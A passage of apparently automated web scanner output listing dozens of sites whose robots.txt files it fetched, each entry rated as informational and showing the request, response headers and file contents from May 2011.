ETag: "b415e659-52-46695584f14ad"
Cache-Control: max-age=14400, public
Expires: Wed, 04 May 2011 07:24:03 GMT
Content-Length: 82
Accept-Ranges: bytes
Age: 217

# robots.txt for http://www.presidentsusa.net/

User-agent: *
Disallow: /i/ #

27.1309. http://www.primecash-advance.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primecash-advance.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.primecash-advance.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:28:38 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.3 mod_ssl/2.8.31 OpenSSL/0.9.8o
Last-Modified: Tue, 11 Jan 2011 15:25:38 GMT
ETag: "36b1192-e7-4d2c7672"
Accept-Ranges: bytes
Content-Length: 231
Connection: close
Content-Type: text/plain

User-Agent: *

Disallow: /_old/
Disallow: /inc/
Disallow: /includes/
Disallow: /privacy/
Disallow: /terms/
Disallow: /unsub/

Noindex: /_old/
Noindex: /inc/
Noindex: /includes/
Noindex: /privacy/
Noin
...[SNIP]...

27.1310. http://www.printsmadeeasy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.printsmadeeasy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.printsmadeeasy.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:38:20 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.7a
Last-Modified: Sat, 01 Aug 2009 12:17:27 GMT
ETag: "1249129047-157"
Accept-Ranges: bytes
Content-Length: 157
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive, close
Cache-Control: max-age=1200
Expires: Wed, 04 May 2011 03:58:20 GMT
Content-Type: text/plain

# /robots.txt file for http://www.PrintsMadeEasy.com/
# mail webmaster@PrintsMadeEasy.com for constructive criticism

User-agent: *
Disallow: /cgi-bin/

27.1311. http://www.pristiq.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pristiq.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pristiq.com

Response

HTTP/1.1 200 OK
Content-Length: 41
Content-Type: text/plain
Last-Modified: Wed, 10 Nov 2010 16:17:06 GMT
Accept-Ranges: bytes
ETag: "c621dab7f280cb1:2e0"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:00:27 GMT
Connection: close

User-agent: *
Disallow: /FTO/signup.aspx

27.1312. http://www.privacychoice.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.privacychoice.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.privacychoice.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:11:45 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 18 Nov 2010 21:32:09 GMT
ETag: "1f482f6-19-4955a85aac840"
Accept-Ranges: bytes
Content-Length: 25
P3P: CP="CAO DSP COR CUR ADM DEV TAI CONo OUR BUS NAV"
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow:

27.1313. http://www.prophotohome.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.prophotohome.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.prophotohome.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:26:01 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 10 Dec 2008 20:12:19 GMT
ETag: "139042f-636-45db6e083aec0"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 04:26:01 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1314. http://www.prorodeo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.prorodeo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.prorodeo.com

Response

HTTP/1.1 200 OK
Content-Length: 27
Content-Type: text/plain
Last-Modified: Fri, 16 Apr 2010 16:57:34 GMT
Accept-Ranges: bytes
ETag: "c2b7f4e885ddca1:1335"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:27:49 GMT
Connection: close

User-agent: *
Allow: /


27.1315. http://www.prostate-massage-and-health.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.prostate-massage-and-health.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.prostate-massage-and-health.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:23:30 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.prostate-massage-and-health.com/iq4ggNTV.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Dis
...[SNIP]...

27.1316. http://www.prphotos.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.prphotos.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.prphotos.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:48:52 GMT
Server: Apache
Last-Modified: Tue, 01 Mar 2011 16:43:28 GMT
ETag: "6c6350a-186-49d6e7ee8ec00"
Accept-Ranges: bytes
Content-Length: 390
Connection: close
Content-Type: text/plain; charset=UTF-8

Sitemap: http://www.prphotos.com/sitemap.xml
User-agent: *
Disallow: /cgi-bin/email.cgi
Disallow: /cgi-bin/Make-a-Store.cgi
Disallow: /cgi-bin/getfull.cgi
Disallow: /cgi-bin/myhistory.cgi
Disallow: /c
...[SNIP]...

27.1317. http://www.pspcrazy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pspcrazy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pspcrazy.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:53:19 GMT
Server: Apache
Last-Modified: Thu, 06 Mar 2008 07:30:18 GMT
ETag: "5c0a0c2-130-447bfb59af680"
Accept-Ranges: bytes
Content-Length: 304
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: activate.php
Disallow: /admincp
Disallow: /admin
Disallow: /functions
Disallow: /skins
Disallow: /templates
Disallow: /useruploads
Disallow: /install
Disallow: /update
...[SNIP]...

27.1318. http://www.psychnet-uk.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.psychnet-uk.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.psychnet-uk.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:02:42 GMT
Server: Apache/2
Last-Modified: Sat, 05 Mar 2011 10:12:29 GMT
ETag: "e77-49db980027d40"
Accept-Ranges: bytes
Content-Length: 3703
Connection: close
Content-Type: text/plain

# File was created by ArchAn Publishing
# Copyright (c) 2011 ArchAn-Publishing. All Rights Reserved.


# PARTIAL access (All Spiders)
User-agent: *
Disallow: /donation/
Disallow: /1xxadaxpay/
Disa
...[SNIP]...

27.1319. http://www.ptc.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ptc.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ptc.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:11:31 GMT
Server: Apache/2.2.15 (Win32) mod_ssl/2.2.15 OpenSSL/0.9.8m PHP/5.2.6
Last-Modified: Tue, 12 Aug 2008 23:19:40 GMT
ETag: "200000000003d-130-4544b8192bb00"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.1320. http://www.publicdomainpictures.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.publicdomainpictures.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.publicdomainpictures.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:14:58 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.8 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Last-Modified: Thu, 19 Feb 2009 14:25:14 GMT
ETag: "196c8a5-94-499d6bca"
Accept-Ranges: bytes
Content-Length: 148
Connection: close
Content-Type: text/plain

User-agent: *
User-agent: Mediapartners-Google*
Disallow: /_private/
Disallow: /cgi-bin/

Sitemap: http://www.publicdomainpictures.net/sitemap.php

27.1321. http://www.publicus.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.publicus.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.publicus.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 14 Dec 2006 16:14:15 GMT
Accept-Ranges: bytes
ETag: "a4a263e69a1fc71:0"
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 02:47:05 GMT
Content-Length: 26
X-Cache: MISS from sxsquid03
X-Cache-Lookup: MISS from sxsquid03:80
Via: 1.0 sxsquid03 (squid/3.0.STABLE18)
Connection: close

User-agent: *
Disallow: /

27.1322. http://www.puppy-stork.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.puppy-stork.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.puppy-stork.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:55:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 27 Sep 2008 14:32:44 GMT
Accept-Ranges: bytes
Content-Length: 182
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Crawl-Delay: 10 #seconds
Sitemap: http://www.puppy-stork.com/sitemap.xml
Request-rate: 1/5 #Pages/Second
Visit-time: 0400-0645 #GMT 24 hour clock


27.1323. http://www.pushplay.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pushplay.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pushplay.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:09:24 GMT
Server: Apache
Last-Modified: Mon, 13 Dec 2010 17:44:33 GMT
ETag: "3530002-e5-4974e41bd2240"
Accept-Ranges: bytes
Content-Length: 229
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Disallow: /front/about*
Disallow: /front/privacy*
Disallow: /front/terms*
Disallow: /front/refund*
Disallow: /front/s*
Disallow: /signup*
Disallow: /css*
Disallow: /js*
Disallow
...[SNIP]...

27.1324. http://www.qassimy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.qassimy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.qassimy.com

Response

HTTP/1.1 200 OK
Server: nginx admin
Date: Wed, 04 May 2011 02:48:20 GMT
Content-Type: text/plain
Content-Length: 706
Last-Modified: Sat, 01 Nov 2008 07:15:35 GMT
Connection: close
Vary: Accept-Encoding
Expires: Wed, 11 May 2011 02:48:20 GMT
Cache-Control: max-age=604800
X-Cache: HIT from Backend
Accept-Ranges: bytes

User-agent: Googlebot-Image
# Allow Everything
Allow: /*


User-agent: googlebot
Disallow: /cgi-bin/


User-agent: MSNBOT
Disallow: /cgi-bin/


User-agent: msnbot-media/1.0
Disallow: /cgi-bin/


User
...[SNIP]...

27.1325. http://www.quackwatch.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quackwatch.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.quackwatch.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:17:12 GMT
Server: Apache
Last-Modified: Thu, 09 Aug 2007 15:03:25 GMT
Accept-Ranges: bytes
Content-Length: 28
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /s/

27.1326. http://www.qualcomm.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.qualcomm.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.qualcomm.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Fri, 27 Aug 2010 02:44:11 GMT
ETag: "475-16ea54c0"
Content-Type: text/plain
Date: Wed, 04 May 2011 02:15:10 GMT
Content-Length: 1141
Connection: close

User-agent: daumoa
Disallow: /

User-agent: Ultraseek
Disallow: /

User-agent: ia_archiver
Disallow: /

User-agent: Googlebot
Crawl-delay: 20

User-agent: Slurp
Crawl-delay: 30

User-agent: twiceler
D
...[SNIP]...

27.1327. http://www.quantumjumping.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.quantumjumping.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:42:06 GMT
Content-Type: text/plain
Content-Length: 525
Last-Modified: Tue, 03 May 2011 05:50:38 GMT
Connection: close
Accept-Ranges: bytes

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

27.1328. http://www.quickandsimple.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quickandsimple.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.quickandsimple.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 680
Content-Type: text/plain
Cache-Control: max-age=529
Date: Wed, 04 May 2011 02:19:04 GMT
Connection: close

User-agent: *
Crawl-delay: 20
Disallow: /ams/
Disallow: /admin/
Disallow: /cgi-bin/
Disallow: /contribute/
Disallow: /comments/
Disallow: /registration/
Disallo
...[SNIP]...

27.1329. http://www.quickstartmoneysite.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quickstartmoneysite.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.quickstartmoneysite.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:16:27 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 23 Nov 2009 23:31:27 GMT
ETag: "2e80004-34-397231c0"
Accept-Ranges: bytes
Content-Length: 52
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /aff/
Disallow: /dpage.htm

27.1330. http://www.quiltedparadise.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quiltedparadise.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.quiltedparadise.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:06:08 GMT
Accept-Ranges: bytes
ETag: W/"108-1240169108000"
Last-Modified: Sun, 19 Apr 2009 19:25:08 GMT
Content-Type: text/plain
Content-Length: 108
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Connection: close
Set-Cookie: BIGipServerquiltingboard_POOL=1390678188.20480.0000; path=/

User-agent: *
Disallow: /un.jsp
Disallow: /privacy_policy.jsp
Disallow: /terms_of_use.jsp
Disallow: /store/

27.1331. http://www.quintura.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quintura.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.quintura.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 01:19:06 GMT
Content-Type: text/plain
Content-Length: 35
Last-Modified: Wed, 08 Dec 2010 09:45:34 GMT
Connection: close
Expires: Thu, 05 May 2011 01:19:06 GMT
Cache-Control: max-age=86400
Set-Cookie: PARTNERCOOK=Wd7VYk3AqYpWsBfIA1pFAg==; expires=Thu, 03-May-12 01:19:06 GMT; domain=quintura.com; path=/
Accept-Ranges: bytes

User-agent: *
Disallow: /personal/

27.1332. http://www.quotesandpoem.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quotesandpoem.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.quotesandpoem.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:56:54 GMT
Server: Apache/2.0.59 (CentOS)
Last-Modified: Fri, 29 Apr 2011 03:33:37 GMT
ETag: "4dc03e-5e1-56d2c640"
Accept-Ranges: bytes
Content-Length: 1505
Cache-Control: max-age=172800, public, must-revalidate
Expires: Wed, 04 May 2011 03:01:54 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /commonitems/EmailLink.php
Disallow: /commonitems/add-link-to-this-page.php
Disallow: /commonitems/add-link-to-this-page.php?id=http://www.quotesandpoem.com/
Disallow: /phpAdsN
...[SNIP]...

27.1333. http://www.racing-games.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.racing-games.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.racing-games.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:16:56 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Wed, 29 Dec 2010 07:07:57 GMT
ETag: "24000e-21-498873a8a6d40"
Accept-Ranges: bytes
Content-Length: 33
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /out.php

27.1334. http://www.radarsync.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radarsync.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.radarsync.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 21 Dec 2010 16:50:57 GMT
Accept-Ranges: bytes
ETag: "dd99593d2fa1cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:49:03 GMT
Connection: close
Content-Length: 345

User-agent: Mediapartners-Google
Disallow:

User-agent: YahooYSMcm
Disallow:

User-agent: Googlebot
Disallow: /search.aspx
Disallow: /software/search.aspx
Noindex: /search.aspx
Noindex: /so
...[SNIP]...

27.1335. http://www.radiator.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radiator.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.radiator.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:02:16 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b PHP/5.2.6
Last-Modified: Fri, 20 Feb 2009 18:44:57 GMT
ETag: "e800a7-1262-4635e0ca41c40"
Accept-Ranges: bytes
Content-Length: 4706
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /conversation
Disallow: /checkout

User-agent: OmniExplorer_Bot
Disallow: /

User-agent: FreeFind
Disallow: /

User-agent: BecomeBot
Disallow: /

User-agent: Nutch
Disallow: /

...[SNIP]...

27.1336. http://www.radiator123.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radiator123.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.radiator123.com

Response

HTTP/1.1 200 OK
Content-Length: 144
Content-Type: text/plain
Last-Modified: Thu, 24 Jun 2010 18:08:29 GMT
Accept-Ranges: bytes
ETag: "8bfec93fc813cb1:1ea07"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:57:14 GMT
Connection: close

User-agent: *
Disallow:

User-agent: msnbot
Crawl-delay: 10

User-agent: Teoma
Crawl-delay: 10

User-agent: Slurp
Crawl-delay: 10


27.1337. http://www.radioparadise.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radioparadise.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.radioparadise.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:57:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 04 Oct 2005 17:34:43 GMT
ETag: "1a3e3-193-402511b7372c0"
Accept-Ranges: bytes
Content-Length: 403
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /graphics/
Disallow: /include/
Disallow: /static/
Disallow: process_donations.html
Disallow: process_donations.php
Disallow: header.php
Disallow: header_forum.php
Disallow: foo
...[SNIP]...

27.1338. http://www.rafasys.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rafasys.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rafasys.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:22:12 GMT
Server: Apache
Last-Modified: Thu, 19 Aug 2010 15:44:41 GMT
Accept-Ranges: bytes
Content-Length: 118
Cache-Control: max-age=31536000
Expires: Thu, 03 May 2012 02:22:12 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain


User-agent: *
Disallow: /go.php
Disallow: /search-type.php


User-agent: Mediapartners-Google*
Disallow:


27.1339. http://www.rajah.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rajah.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rajah.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:03:00 GMT
Server: Apache
Last-Modified: Mon, 21 Feb 2011 20:24:50 GMT
ETag: "24f0e82-437-a7d92880"
Accept-Ranges: bytes
Content-Length: 1079
Age: 7178
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Crawl-delay: 10
# Directories
Disallow: /base/includes/
Disallow: /base/misc/
Disallow: /base/modules/
Disallow: /base/profiles/
Disallow: /base/scripts/
Disallow: /base/themes/
# Files

...[SNIP]...

27.1340. http://www.random-good-stuff.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.random-good-stuff.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.random-good-stuff.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 02:20:54 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: wp_ozh_wsa_visits=1; expires=Thu, 03-May-2012 02:20:54 GMT; path=/
Set-Cookie: wp_ozh_wsa_visit_lasttime=1304475654; expires=Thu, 03-May-2012 02:20:54 GMT; path=/
X-Pingback: http://www.random-good-stuff.com/xmlrpc.php
Content-Length: 82
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.random-good-stuff.com/sitemap.xml.gz

27.1341. http://www.rapidmaniac.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rapidmaniac.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rapidmaniac.com

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Wed, 04 May 2011 01:10:38 GMT
Content-Type: text/plain; charset=utf8
Connection: close
Last-Modified: Sat, 05 Mar 2011 06:41:12 GMT
ETag: "410f9e-ad-49db68c66d200"
Accept-Ranges: bytes
Content-Length: 173
Vary: Accept-Encoding

User-agent: *

Disallow: /dmca
Disallow: /faq
Disallow: /contact
Disallow: /submit
Disallow: /login
Disallow: /rate
Disallow: /captcha
Disallow: /a
Disallow: /search/catalog

27.1342. http://www.rayovac.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rayovac.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rayovac.com

Response

HTTP/1.1 200 OK
Set-Cookie: ACE-ECOMMERCE=R1317954497; path=/
Cache-Control: max-age=2592000
Content-Type: text/plain
Last-Modified: Sun, 24 Oct 2010 00:27:39 GMT
Accept-Ranges: bytes
ETag: "decae3431273cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:17:51 GMT
Connection: close
Content-Length: 149

User-agent: *
Disallow: /ViewCart.aspx
Disallow: /CheckoutPage.aspx
Disallow: /ConsumerService/Account.aspx
Disallow: /bin/
Disallow: /images/

27.1343. http://www.rcpsych.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rcpsych.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rcpsych.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:15:12 GMT
Server: Apache/1.3.26 (Unix) DAV/1.0.3 ApacheJServ/1.1.2
Last-Modified: Tue, 15 Feb 2011 17:10:42 GMT
ETag: "1d-529-4d5ab392"
Accept-Ranges: bytes
Content-Length: 1321
Connection: close
Content-Type: text/plain

User-agent: *
crawl-delay: 10
Disallow: /adsystem
Disallow: /cgi/authordata
Disallow: /cgi/folders
Disallow: /cgi/citemap
Disallow: /cgi/cookietest
Disallow: /cgi/eletter-submit
Disallow: /accesslogs

...[SNIP]...

27.1344. http://www.rcrwireless.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rcrwireless.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rcrwireless.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 12 May 2009 20:14:04 GMT
Accept-Ranges: bytes
ETag: "3a9491323ed3c91:0"
Server: Microsoft-IIS/7.0
Date: Tue, 03 May 2011 22:27:28 GMT
Content-Length: 259
Age: 13155
X-Cache: HIT from sxsquid02
X-Cache-Lookup: HIT from sxsquid02:80
Via: 1.0 sxsquid02 (squid/3.0.STABLE18)
Connection: close

# Robots.txt
# Be nice.
#
User-Agent: *
Allow: /
Sitemap: http://www.rcrwireless.com/sitemap.xml

User-agent: *
Disallow: /cgi-bin/
Disallow: /apps
Disallow: /ct.ashx*
Disallow: /news
Disa
...[SNIP]...

27.1345. http://www.readersdigeststore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.readersdigeststore.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.readersdigeststore.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:24:29 GMT
Server: Server
Content-Length: 258
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: text/plain
Connection: close

User-agent: *
Disallow: /addToCart.htm
Disallow: /cart.htm
Disallow: /updateCart.htm
Disallow: /checkout.htm
Disallow: /*refineBy*$
# BEGIN AMAZON-WEBSTORE-SITEMAP
Sitemap: http://www.readersdi
...[SNIP]...

27.1346. http://www.realcareeradvice.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realcareeradvice.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.realcareeradvice.com

Response

HTTP/1.1 200 OK
Content-Length: 28
Content-Type: text/plain
